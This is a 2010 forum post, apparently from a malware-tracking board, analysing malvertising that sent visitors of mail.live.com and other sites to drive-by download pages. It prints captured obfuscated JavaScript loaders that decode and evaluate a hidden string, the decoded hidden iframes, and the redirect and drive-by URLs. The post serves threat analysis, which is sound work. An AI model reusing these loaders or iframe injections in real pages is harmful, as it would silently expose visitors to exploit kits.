Author Topic: adnet.media.*.com domains - NEW TITLE  (Read 46055 times)

0 Members and 1 Guest are viewing this topic.

August 06, 2010, 05:37:24 pm
Reply #60

eoin.miller

  • Sr. Member

  • Offline
  • ****

  • 179
facilitatedigital.net

For the last day or so people logging into mail.live.com, menshealth.com and a bunch of others have been getting malvertising redirecting them to drive by sites. However, they have been flipping the switch on and off for redirecting to the drive bys.

Example URL that serves up obfuscated javascript that does not contain the drive by:

http://facilitatedigital.net/rc/js/ld/?fn=11a&sid=1112535&dpn=75zh1&fp=n&ctp=y9i12

Response:
Code: [Select]
HTTP/1.1 200 OK
Server: nginx/0.8.45
Date: Thu, 05 Aug 2010 <REMOVED>
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 1087


var MPvpZm=new String('evafeds'.substr(0,3)+'bruller'.substr(3,1));var GsZiFN=thi
s;var kkMsoVj=GsZiFN [MPvpZm];var oxdh=new String('unescape');var ugoi=GsZiFN [ox
dh];var HIhVN='6J/6JA6Jn6Qk6JR6Jk6J16Q/6a16QQ6Qa6JU6Q/6Jk6aM6Qk6J16Jk6Qn6Jn6J_6Q9
6Jk6aM6aa6ak6nn6/n6J_6a96JM6Qa6Jk6JJ6nR6aQ6JM6Q/6Q/6Q96ak6nn6/_6ak6na6/J6ak6na6/J
6QQ6QQ6QQ6a16JJ6JG6JU6JQ6JM6Q/6J16Jk6Q/6QQ6JA6Qa6Jl6a16Jn6JA6JR6ak6na6/J6aQ6a96Q/
6J_6Qa6JQ6Jk6Q/6nR6aQ6kA6Ja6JG6J_6J16Jl6aQ6ak6nn6/k6ak6nn6/n6JU6JR6JQ6a96Qn6Qa6Jn
6nR6aQ6JM6Q/6Q/6Q96nP6aA6aA6JJ6J_6Jn6JU6JG6JU6Q/6J_6Q/6Jk6J/6JU6JQ6JU6Q/6J_6JG6a1
6J16Jk6Q/6aA6Ja6J/6Ja6aA6/J6JG6JU6JQ6JM6Q/6/16Jk6Q/6aA6n_6nJ6n96QM6nJ6n96n96kA6n9
6n/6a16JP6Q96JQ6aQ6a96Ja6JA6Qa6J/6Jk6Qa6nR6aQ6n96aQ6a96ak6nn6/k6ak6nn6/n6aA6J_6ak
6nn6/k6aa6aU6aU6nl69P69P69P';var _Mge='WXfmR9Fs6OV3DTZ4QyYcL-G=txvz_ajw207.EN?&JH
MdKUk5PB:8Ai/luIop%CS1benrhqg';var XOy='F8LSEUA3JzbnRio/0HBe.&jdKO%Wr:cxa9Qp1ut-D
ysgT=IkmlZMPV7Y4v?26Gh_CwX5qfN';var cYS='';var _eTy;var irIk;for(_eTy=0;_eTy<HIhV
N.length;_eTy++){ irIk=XOy.indexOf(HIhVN.charAt(_eTy));if(irIk>-1){ cYS+=_Mge.cha
rAt(irIk);}}kkMsoVj(ugoi(cYS));


Then some of the adverising servers in the same netblock (media.topsann.com) will *sometimes* serve up the obfuscated javascsript that redirects to the drive by:

JSUnpack report: http://jsunpack.jeek.org/dec/go?report=812b87a1ed2c803ceb6b81671f99107280d2d241

URL: http://media.topsann.com/ad/js/ld/?chn=22a&bfx=16tz516&sid=176552&zed=81963&fl=no&rtr=y

Response:
Code: [Select]
HTTP/1.1 200 OK
Server: nginx/0.8.45
Date: Fri, 06 Aug 2010 <REMOVED>
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 3652


var bibak=new String('evafeds'.substr(0,3)+'bruller'.substr(3,1));var Thhx=this;v
ar EDTmvV=Thhx [bibak];var sxMKjk=new String('unescape');var Uzym=Thhx [sxMKjk];v
ar Hz_c='TjBTZ8TZsTX=TZsTX/TX8TZsTXUTXyTvjT8UTvjTvATXcTXWTZZTvjTssTX=TZsTXWTvATXc
TXWTZZTvjTssTX=TZsTXWTvATv/TvcTXZTXWTZsTsXTZWTXyTXyTW/TXWTX=TZvTvATv/TvyTvjT8jTvy
TvjT8=TvyTvjT8jTvyTvjT8jTvyTvjT8jTvyTvjT8jTv/TvjTvUTvjTXcTXWTZZTvjTssTX=TZsTXWTvA
TXcTXWTZZTvjTssTX=TZsTXWTvATXcTXWTZZTvjTssTX=TZsTXWTvATv/TvcTXZTXWTZsTsXTZWTXyTXy
TW/TXWTX=TZvTvATv/TvyTvjT8jTvyTvjT8=TvyTvjT8jTvyTvjT8jTvyTvjT8jTvyTvjT8jTv/TvcTZs
TXpTsZTsUTWsTW8TZsTZvTX/TXcTXZTvATv/TvcTZ8TZWTXvTZ8TZsTZvTX/TXcTXZTvAT8jTvyTvjTXc
TXWTZZTvjTssTX=TZsTXWTvATXcTXWTZZTvjTssTX=TZsTXWTvATv/TvcTXZTXWTZsTsXTZWTXyTXyTW/
TXWTX=TZvTvATv/TvyTvjT8jTvyTvjT8=TvyTvjT8jTvyTvjT8jTvyTvjT8jTvyTvjT8jTv/TvcTZsTXp
TsZTsUTWsTW8TZsTZvTX/TXcTXZTvATv/TvcTXyTX=TZ8TZsTs/TXcTXsTXWTZATspTXXTvATvvTvjTvv
Tv/TvUT8=Tv/Tv/Tv/TvjTvpTvjTvAT8=T8jT8jT8jTvjTvBTvjT8XT8jTvjTvBTvjT8XT8jTv/T8nTjB
TjBTZXTX=TZvTvjTX=TXyTXyTWpTZsTvjT8UTvjTvvTvvT8nTjBTZXTX=TZvTvjTXUTZsTX8TXATvjT8U
TvjTX=TXyTXyTWpTZsTvcTXUTX=TZsTX8TXATvATZ8TZsTX=TZsTX/TX8TZsTXUTXyTv/T8nTjBTjBTjB
TjBTX/TXXTvjTvATvjTXUTZsTX8TXATvjTv=T8UTvjTXcTZWTXyTXyTvjTv/TvjTZnTjBTXsTXpTX8TZW
TXUTXWTXcTZsTvcTZZTZvTX/TZsTXWTvATZWTXcTXWTZ8TX8TX=TZjTXWTvATvvTvWT88Ts8TX/TXXTZv
TX=TXUTXWTvjTZ8TZvTX8T8UTvZTXATZsTZsTZjT8BTvpTvpTXUTXWTXsTX/TX=TvcTZsTXpTZjTZ8TX=
TXcTXcTvcTX8TXpTXUTvpTZ8TZsTX=TZsTZ8TWpTZsTvcTZjTXATZjT8pTX/TXsT8UT8=T8ZT8XT8WT8W
T8vTvXTZ8T8UT8jTvXTXWT8UT8=TvZTvjTZ8TZsTZ/TXyTXWT8UTvZTZXTX/TZ8TX/TXvTX/TXyTX/TZs
TZ/T8BTXATX/TXsTXsTXWTXcT8nTvZTvjTZZTX/TXsTZsTXAT8UTvZT8jTvZTvjTXATXWTX/TXZTXATZs
T8UTvZT8jTvZTvjTvjTvWT88TsWTvWT88Ts8TvpTX/TXXTZvTX=TXUTXWTvWT88TsWTvvTv/Tv/T8nTjB
TZUTvjTvjTXWTXyTZ8TXWTvjTvjTZnTjBTjBTj/Tj/TjBTXsTXpTX8TZWTXUTXWTXcTZsTvcTZZTZvTX/
TZsTXWTvATZWTXcTXWTZ8TX8TX=TZjTXWTvATvvTvWT88Ts8TX/TXXTZvTX=TXUTXWTvjTZ8TZvTX8T8U
TvZTXATZsTZsTZjT8BTvpTvpTXUTXWTZ8TXpTXUTXpTZsTvcTX8TXpTvcTX8TX8TvpTZvTX8TZvTXsTX8
TZATvcTZjTXATZjT8pTXZTXBT8UTX8TZWTZ8TZsT8=T8vTvZTvjTZ8TZsTZ/TXyTXWT8UTvZTZXTX/TZ8
TX/TXvTX/TXyTX/TZsTZ/T8BTXATX/TXsTXsTXWTXcT8nTvZTvjTZZTX/TXsTZsTXAT8UTvZT8=TvZTvj
TXATXWTX/TXZTXATZsT8UTvZT8=TvZTvjTvWT88TsWTvWT88Ts8TvpTX/TXXTZvTX=TXUTXWTvWT88TsW
TvvTv/Tv/T8nTvjTjBTjBTXsTXpTX8TZWTXUTXWTXcTZsTvcTZZTZvTX/TZsTXWTvATZWTXcTXWTZ8TX8
TX=TZjTXWTvATvvTvWT88Ts8TX/TXXTZvTX=TXUTXWTvjTZ8TZvTX8T8UTvZTXATZsTZsTZjT8BTvpTvp
TXUTXWTXsTX/TX=TvcTZsTXpTZjTZ8TX=TXcTXcTvcTX8TXpTXUTvpTZ8TZsTX=TZsTZ8TWpTXBTZ8TWp
TXWTvcTZjTXATZjT8pTX/TXsT8UT8=T8ZT8XT8WT8WT8vTvZTvjTZ8TZsTZ/TXyTXWT8UTvZTZXTX/TZ8
TX/TXvTX/TXyTX/TZsTZ/T8BTXATX/TXsTXsTXWTXcT8nTvZTvjTZZTX/TXsTZsTXAT8UTvZT8=TvZTvj
TXATXWTX/TXZTXATZsT8UTvZT8=TvZTvjTvWT88TsWTvWT88Ts8TvpTX/TXXTZvTX=TXUTXWTvWT88TsW
TvvTv/Tv/T8nTjBTjBTjBTZUTjBTjBTXsTXpTX8TZWTXUTXWTXcTZsTvcTZZTZvTX/TZsTXWTvATZWTXc
TXWTZ8TX8TX=TZjTXWTvATvvTvWT88Ts8TX=TvjTXATZvTXWTXXT8UTvZTXATZsTZsTZjTvWT88Ts=TvW
T8vTsXTvWT8vTsXTZZTZZTZZTvcTXvTX/TXZTX8TXpTXUTXUTXWTZvTX8TXWTvcTX8TXpTXUTvWT8vTsX
TvWT88TsXTXATZvTXWTXXTvWT88TssT8ZTXsTXUTvUT8=TvZTvjTZsTX=TZvTXZTXWTZsT8UTvZTWpTXv
TXyTX=TXcTXnTvZTvWT88TsWTvWT88Ts8TX/TXUTXZTvjTZ8TZvTX8T8UTvZTXATZsTZsTZjT8BTvpTvp
TXUTXWTXsTX/TX=TvcTZsTXpTZjTZ8TX=TXcTXcTvcTX8TXpTXUTvpTXvTXsTXvTvpTX=TsvTX/TXZTs8
TXpTXUTXUTXWTZvTX8TXWTvpT8ZT8vT8ATZAT8/T8jTZ8TZsTX=TZsTvcTXZTX/TXXTvZTvjTXvTXpTZv
TXsTXWTZvT8UTvZT8jTvZTvjTvWT88TsWTvWT88Ts8TvpTX=TvWT88TsWTvvTv/Tv/T8nTjBTjBTjB';v
ar DpdNZ='mEeYnB0osA1-6SC:raMQ=XFyK/5&PpD_I2xLH3OZjqJwb4dV9RWfgv.l7ktiuzhNc%T?G8U
';var t_H='3caPmnjI6B=JX0yOVCS-9op5u_Wf1iUY.v2%K8MxlE7hDs:?/wQ4LtHqZFGd&NbReTkgzA
r';var rSE='';var Jnox;var t_dIH;for(Jnox=0;Jnox<Hz_c.length;Jnox++){ t_dIH=t_H.i
ndexOf(Hz_c.charAt(Jnox));if(t_dIH>-1){ rSE+=DpdNZ.charAt(t_dIH);}}EDTmvV(Uzym(rS
E));

This causes a hidden iframe to be written that causes the client to hit a redirect to a driveby:

Code: [Select]
<iframe src='http://mesomot.co.cc/rcrdcx.php?gj=cust12' style='visibility:hidden;' width='1' height='1' ></iframe><iframe src='http://media.topsann.com/stats_js_e.php?id=176552' style='visibility:hidden;' width='1' height='1' ></iframe>
The co.cc domain redirects then to the actual driveby located here:
http://uyyty.com/qu/sjmba.php

This drive by is again single shot and subsequent visits to it will not serve up exploits, it will usually just redirect to google.com.